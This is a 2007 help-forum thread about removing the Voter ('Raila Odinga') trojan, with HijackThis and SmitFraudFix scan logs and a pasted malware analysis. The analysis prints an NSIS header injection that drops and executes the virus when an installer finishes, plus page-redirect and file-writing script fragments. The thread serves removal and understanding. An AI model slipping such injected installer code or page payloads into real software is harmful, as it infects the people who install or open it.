How to remove Trojan.NSIS.Voter.a

Clone
September 23, 2007 at 00:35:21
Specs: WinXp, P4/256 Mb

I got infected with this virus commonly known as Raila Odinga Virus or Voterai with alias names known as DR/NSIS.Voter.A (H+Bedv) / TROJ_VOTERAI.A (Trend) / Trojan.NSIS.Voter.a (Kaspersky) / Worm/Generic.BQP (Grisoft) which displays Vote Advert for Raila Odinga, it displays Popup Message "Vote Advert for Raila Odinga". Can someone help me on how to get rid of this infection, What effective removal tools can get rid of this infection or If it possible to remove the infection manually and if there are any removal tools available right know.

Thanks for your help.

Kile.


See More: How to remove Trojan.NSIS.Voter.a

Report •


#1
September 23, 2007 at 06:11:46

Please download and install the latest version of HijackThis v2.0.2:

Download the HijackThis Installer from this link: HijackThis

1. Save " HJTInstall.exe" to your desktop.
2. Double click on HJTInstall.exe to run the program.
3. By default it will install to C:\Program Files\Trend Micro\HijackThis.
4. Accept the license agreement by clicking the "I Accept" button.
5.Click on the "Do a system scan and save a log file" button. It will scan and then ask you to save the log.
6. Click "Save log" to save the log file and then the log will open in Notepad.
7. Click on "Edit > Select All" then click on "Edit > Copy" to copy the entire contents of the log.
8. Paste the log in your next reply.
9. Do NOT have HijackThis fix anything yet! Most of what it finds will be harmless or even required.

Please download SmitFraudFix from this link http://siri.urz.free.fr/Fix/Smitfra... Then extract the contents to your desktop.

!!!! Only run option #1 as runing the other options on an uninfected computer will damage the desktop.!!!!


Open the "SmitfraudFix" folder and double-click "smitfraudfix.cmd"
Select option #1 - Search by typing 1 and press "Enter"; a text file will appear, which lists infected files (if present).
Please copy/paste the content of that report into your next reply.
Note : process.exe is detected by some antivirus programs (AntiVir, Dr.Web, Kaspersky) as a "RiskTool"; it is not a virus, but a program used to stop system processes. Antivirus programs cannot distinguish between "good" and "malicious" use of such programs, therefore they may alert the user.


Report •

#2
September 29, 2007 at 05:06:46

Hello,

This are the results of HijackThis and SmitFraudFix:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:32:56 PM, on 9/29/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\Program Files\Comodo\CBOClean\BOCORE.exe
C:\Program Files\Comodo\Firewall\cmdagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\lvhidsvc.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\wdfmgr.exe
c:\program files\mcafee.com\vso\mcvsshld.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
c:\program files\mcafee.com\agent\mcagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCD.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe
C:\Program Files\Winamp\winampa.exe
C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\avpo.exe
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Program Files\TVR\TVR\RecSche.EXE
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\drivers\2007-09 (Sep).exe
C:\WINDOWS\system32\drivers\autorun.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE (KINYEREZI.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE.exe
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\drivers\scan0002.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\Program Files\Winamp\winamp.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\Program Files\Windows NT\Accessories\wordpad.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\spoolsv.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.microsoft.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: PCTools Site Guard - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - C:\PROGRA~1\SPYWAR~2\tools\iesdsg.dll
O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: PCTools Browser Monitor - {B56A7D7D-6927-48C8-A975-17DF180C71AC} - C:\PROGRA~1\SPYWAR~2\tools\iesdpb.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: McAfee VirusScan - {BA52B914-B692-46c4-B683-905236F6F655} - c:\progra~1\mcafee.com\vso\mcvsshl.dll
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Nero\Nero 7\InCD\InCD.exe
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe"
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [MS32DLL] C:\WINDOWS\MS32DLL.dll.vbs
O4 - HKLM\..\Run: [BOC-425] C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
O4 - HKLM\..\Run: [VirusScan Online] C:\Program Files\McAfee.com\VSO\mcvsshld.exe
O4 - HKLM\..\Run: [OASClnt] C:\Program Files\McAfee.com\VSO\oasclnt.exe
O4 - HKLM\..\Run: [MCAgentExe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe
O4 - HKLM\..\Run: [MCUpdateExe] C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKLM\..\RunServices: [LvHidSvc] C:\WINDOWS\system32\lvhidsvc.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [avpa] C:\WINDOWS\system32\avpo.exe
O4 - HKCU\..\Run: [] C:\WINDOWS\system32\drivers\scan
O4 - HKUS\S-1-5-19\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')
O4 - Startup: 2007-09 (Sep).lnk = ?
O4 - Startup: autorun.lnk = ?
O4 - Startup: K'S TAX INVOICE (KINYEREZI.lnk = ?
O4 - Startup: K'S TAX INVOICE.lnk = ?
O4 - Startup: ldupver.lnk = ?
O4 - Startup: scan.lnk = ?
O4 - Startup: scan0002.lnk = ?
O4 - Global Startup: TVR Schedule.lnk = ?
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Spyware Doctor - {2D663D1A-8670-49D9-A1A5-4C56B4E14E84} - C:\PROGRA~1\SPYWAR~2\tools\iesdpb.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{1A62DFC3-A742-4EB8-8970-82A7B23D3E65}: NameServer = 196.46.100.2 196.46.104.2
O17 - HKLM\System\CS1\Services\Tcpip\..\{1A62DFC3-A742-4EB8-8970-82A7B23D3E65}: NameServer = 196.46.100.2 196.46.104.2
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: BOCore - COMODO - C:\Program Files\Comodo\CBOClean\BOCORE.exe
O23 - Service: Comodo Application Agent (CmdAgent) - COMODO - C:\Program Files\Comodo\Firewall\cmdagent.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Lifeview HID Remote Controller Service (lvhidsvc) - Animation Technologies Inc. - C:\WINDOWS\system32\lvhidsvc.exe
O23 - Service: McAfee WSC Integration (McDetect.exe) - McAfee, Inc - c:\program files\mcafee.com\agent\mcdetect.exe
O23 - Service: McAfee.com McShield (McShield) - McAfee Inc. - c:\PROGRA~1\mcafee.com\vso\mcshield.exe
O23 - Service: McAfee Task Scheduler (McTskshd.exe) - McAfee, Inc - c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
O23 - Service: McAfee SecurityCenter Update Manager (mcupdmgr.exe) - McAfee, Inc - C:\PROGRA~1\McAfee.com\Agent\mcupdmgr.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: PC Tools Spyware Doctor (SDhelper) - PC Tools Research Pty Ltd - C:\Program Files\Spyware Doctor\sdhelp.exe

--
End of file - 9149 bytes


SmitFraudFix v2.227

Scan done at 12:37:10.87, Sat 09/29/2007
Run from C:\Documents and Settings\Clement\Desktop\SmitfraudFix
OS: Microsoft Windows XP [Version 5.1.2600] - Windows_NT
The filesystem type is NTFS
Fix run in normal mode

»»»»»»»»»»»»»»»»»»»»»»»» Process

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\Program Files\Comodo\CBOClean\BOCORE.exe
C:\Program Files\Comodo\Firewall\cmdagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\lvhidsvc.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\wdfmgr.exe
c:\program files\mcafee.com\vso\mcvsshld.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
c:\program files\mcafee.com\agent\mcagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCD.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe
C:\Program Files\Winamp\winampa.exe
C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\avpo.exe
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Program Files\TVR\TVR\RecSche.EXE
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\drivers\2007-09 (Sep).exe
C:\WINDOWS\system32\drivers\autorun.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE (KINYEREZI.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE.exe
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\drivers\scan0002.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\Program Files\Winamp\winamp.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\Program Files\Windows NT\Accessories\wordpad.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

»»»»»»»»»»»»»»»»»»»»»»»» hosts


»»»»»»»»»»»»»»»»»»»»»»»» C:\


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\Web


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system32


»»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\Clement


»»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\Clement\Application Data


»»»»»»»»»»»»»»»»»»»»»»»» Start Menu


»»»»»»»»»»»»»»»»»»»»»»»» C:\DOCUME~1\Clement\FAVORI~1


»»»»»»»»»»»»»»»»»»»»»»»» Desktop


»»»»»»»»»»»»»»»»»»»»»»»» C:\Program Files


»»»»»»»»»»»»»»»»»»»»»»»» Corrupted keys


»»»»»»»»»»»»»»»»»»»»»»»» Desktop Components

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0]
"Source"="About:Home"
"SubscribedURL"="About:Home"
"FriendlyName"="My Current Home Page"

»»»»»»»»»»»»»»»»»»»»»»»» Sharedtaskscheduler
!!!Attention, following keys are not inevitably infected!!!

SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll


»»»»»»»»»»»»»»»»»»»»»»»» AppInit_DLLs
!!!Attention, following keys are not inevitably infected!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=""


»»»»»»»»»»»»»»»»»»»»»»»» Winlogon.System
!!!Attention, following keys are not inevitably infected!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"System"=""


»»»»»»»»»»»»»»»»»»»»»»»» Rustock

»»»»»»»»»»»»»»»»»»»»»»»» DNS

»»»»»»»»»»»»»»»»»»»»»»»» Scanning for wininet.dll infection


»»»»»»»»»»»»»»»»»»»»»»»» End

What i found is the Following suspicious files:

4 - Startup: 2007-09 (Sep).lnk = ?
O4 - Startup: autorun.lnk = ?
O4 - Startup: K'S TAX INVOICE (KINYEREZI.lnk = ?
O4 - Startup: K'S TAX INVOICE.lnk = ?
O4 - Startup: ldupver.lnk = ?
O4 - Startup: scan.lnk = ?
O4 - Startup: scan0002.lnk = ?

Whenever you try to click on one of the files it will bring a popup Ad "Vote for Raila Odinga" in any photo editor or when you log in all the above files opens up as Popup Ads and keeps on doing so after every few minutes.

What are the procedures of getting rid of the infection or what removal tools should i use remove and protect my computer against the infection.

Thanks,

Kile.

NB: Please read the following information i got from the internet about the infection:

Raila Virus
Aliases TROJ_VOTERAI.A (Trend Micro), Trojan.NSIS.Voter.a (Kaspersky) , Worm/Generic.BQP (Grisoft)

The uniqueness of the virus is that it seems to urge computer users to vote for a particular presidential candidate and thus subsequently pops up at randomized intervals.

In the month of june alone, several different versions of the same virus dubbed Voterai by MCafee AV firm and aliases such as W32/Voter-B was identified and added to the respective firms AV databases. The virus has been cartegorized as low risk (lacks mass mailing capabilities ) but rather seems to spread through removable drives and network shares.

It is estimated to have infected well over 150, 000 desktop computers by the end of june in Kenya alone and still remains the most common virus problem experienced in the country at the moment. The virus group that is responsible for the virus are calling themselves "Hackers for the Raila Odinga Campaign 2007". Its association with the campaign office has not yet been determined as our efforts to get a statement on the issue have been unsuccessful.

Given that several variants of the same virus seem to be released daily, its impact has been felt locally, especially by Cybercafe operators who seem to be incubating the virus and also the AV firms are less concerned (only reacted after a copy made its way overseas apparently from a student from JKUAT who had gone abroad and unknowingly carried it on his flash drive. The sample was later submitted to Sophos who classified it as a worm (Worm/voter.B (sophos)). We have yet to establish where McFee the first AV firm to detect the variant got their sample) and seem to be reacting too slowly to the threat. Most of the updates are already useless as new variants of the virus seem to evade detection and use new infection techniques undetectable heuristically.

The initial assessment of the virus which claimed it to be a Trojan was since wrong as Kaspersky reclassified the first variants of the virus to Win32.autorun.XXX series after they realized it could spread through removable drives. The newer variants are more harder to detect as they hardly popup, instead infect html files by appending the code "<META http-equiv='refresh' content='1;URL=http://www.raila2007.com'>" at the end of web documents (.htm, .html) which automatically redirects the page to the site above after 1 second. Other variants append the following code enclosed within a script tag (trimmed for security reasons) "<Set filesrc = fso.createtextfile(\"c:\\hummer.exe\",true)" and is meant to copy the virus to the drive and execute (a method of spreading the virus).

Only Grisofts AVG seemed to detect the virus embedded within the document as a VBS worm. Other AVs including Kaspersky and Norton couldn't find anything. An additional blank function tag "dummy()" which is repeatedly called in between statements seems to be what makes the virus undetectable. However Kaspersky heuristics seem to catche the virus when it attempts to execute and flags it as a hidden install (of course a user will think its a fasle alarm and probaly allow it to execute).

Weve also received reports that a new variant may be infecting zipped files. Although we are yet to confirm this, it is possible to unpack files, infect them and repack them again. But we think that it is highly unlikely as zip functions would increase the file size of the virus upto 3 times making it too bulky to spread and also the zipping processes would be too slow and thats why most viruses omit this feature. Same reports also indicate that it has mass mailing capabilities (sends itself through outlook) but this is highly unlikely as outlook doesnt allow certain file extensions to be sent especially file executables unless the virus zips itself before the operation.

To be exact heres the AV firms breakdown:

Trend Micro Systems...

W32/Voter-B spreads by copying itself to removable storage devices.
When first run W32/Voter-B copies itself to:
<System>\drivers\<random name>.exe and creates the following file:
<Desktop>\Raila Odinga.gif - clean may be safely deleted.
W32/Voter-B displays the above mentioned file.
When W32/Voter-B spreads, it copies itself as well as the following files:
-- autorun.inf (clean)
-- autorun.exe (copy of W32/Voter-B)
-- Ralia Odinga.exe (copy of W32/Voter-B)
-- Ralia Odinga.gif (clean)
-- smss.exe (copy of W32/Voter-B)
W32/Voter-B creates the following registry entry to start itself automatically:
-- HKCU\Software\Microsoft\Windows\CurrentVersion\Run<original filename>.exe <System>\drivers\<original filename>.exe

McAfee Antivirus...

Overview

Detection was added to cover for a malicious 32 bit PE file originally called "Raila Odinga.exe" , having a filesize of 97.579 bytes.
Aliases
* DR/NSIS.Voter.A (H+Bedv)
* TROJ_VOTERAI.A (Trend)
* Trojan.NSIS.Voter.a (Kaspersky)
* Worm/Generic.BQP (Grisoft)

Characteristics

Detection was added to cover for a malicious 32 bit PE file originally called "Raila Odinga.exe" , having a filesize of 97.579 bytes. The file is a nullsoft installer file. Upon running, it drops and displays a picture file of "Raila Odinga", this is just an attention drawer.

Apart from copying itself to the system Raila Odinga.gif is also placed on the desktop and repeatedly opened. In the meantime, the Raila Odinga.exe binary file is being copied silently copied to the windows directory and creates a registry entry to it:

* c:\WINDOWS\system32\drivers<wbr></wbr>\Raila Odinga.exe
* HKEY_CURRENT_USER\Software<wbr></wbr>\Microsoft\Windows\CurrentVersi<wbr></wbr>on\Run "(Default)"
Data: C:\WINDOWS\system32\drivers<wbr></wbr>\Raila Odinga

It drops an innocent file called "system.dll" having a filesize of 10240 bytes.

* c:\Documents and Settings\userxyz\Local Settings\Temp\nsf5.tmp\System<wbr></wbr>.dll
* c:\Documents and Settings\userxyz\Local Settings\Temp\nsv3.tmp\System<wbr></wbr>.dll

A link file is added as:
* c:\Documents and Settings\userxyz\Start Menu\Programs\Startup\Raila Odinga.lnk

Symptoms

* Presence of a malicious 32 bit PE file originally called "Raila Odinga.exe" , having a filesize of 97.579 bytes
* Picture file "Raila Odinga.gif" being placed on the desktop and repeatedly opened automatically in photo editors

Advanced analysis

Based of the 2 AV firms breakdown, there seems to be a difference in how the virus is being detected. McAfee the first firm to detect the virus classifies it as a trojan while Trend Micro seem to think it is a worm that spreads across removable drives. The differences may occur as they may have obtained different samples of the same virus from various sources. So who's correct..Apparently both.

The virus seems to have been compiled using a number of different icons most commonly the MS Word icon and the JPEG icon which make it difficult for users to differentiate between the virus and legitimate programs. The virus also seems to copy itself to removable drives and adds an autorun file to the drive to ensure automatic execution when the infected drive is accessed.

So why so many different yet undetectable copies of the same virus with different icons. Simple possibilities may be:

---The virus writer collects a number of icons say a 100 and rewrites his code say a hundred times and tests all the samples to make sure they are not detected by any of the av available. Of course this is so impractical and time consuming. Cant work. So we go to option two:

---The virus may be carrying its source code along with it and once it finds a suitable system with a compiler it proceeds to collect icons from the host system and recompiles itself at the same time changing aspects of its code or downloading the latest code from the internet. Seems practical enough as some viruses are known to do the same thing. But then requires too much skillz which the virus writer may not have.

---The most likely way that the virus infects source code from other users systems. They proceed to compile the code unknowingly and distribute it. This is difficult to detect as these programs may be flagged by AV software as malicious yet the user knows that he acquired the program from a reliable source.

We have since received an infected source file which we examined and the results are as follows:

The file confirms option 3 whereby the virus infects source files. Apparently it infects one file (we think). The virus seems to infect a .nsh file extension that belongs to the Nullsoft Installer also the language that the virus is coded in. It appends the following lines:

!include "C:\Program Files\NSIS\Contrib\Modern UI\System.nsh" --- normal header declaration
---------------------added by the -----
!define REDIRECT_ME "redirect"
!ifdef REDIRECT_ME
Function .onGUIEnd
SetOutPath "c:\"
File "$WHEREIS\$filename"
ExecShell "open" "c:\Hummer.exe"
FunctionEnd
!endif

The code above hijacks the function .onGUIEnd which usually executes after an installer completes. Basically during compilation the code above includes the virus file into the installer which when the installation of the particular program completes the function copies the virus file to c:\Hummer.exe and executes it --- infecting your system. We are still yet to determine how effective this technique is or how many installers may be infected. But given that the Nullsoft Install System is largely used by non-microsoft programmers (Microsoft has own installer uses MSI technology) who are really few and most of whom are very likely to notice the change in the file, its highly unlikely that this technique poses a major threat.


Report •

Related Solutions


Ask Question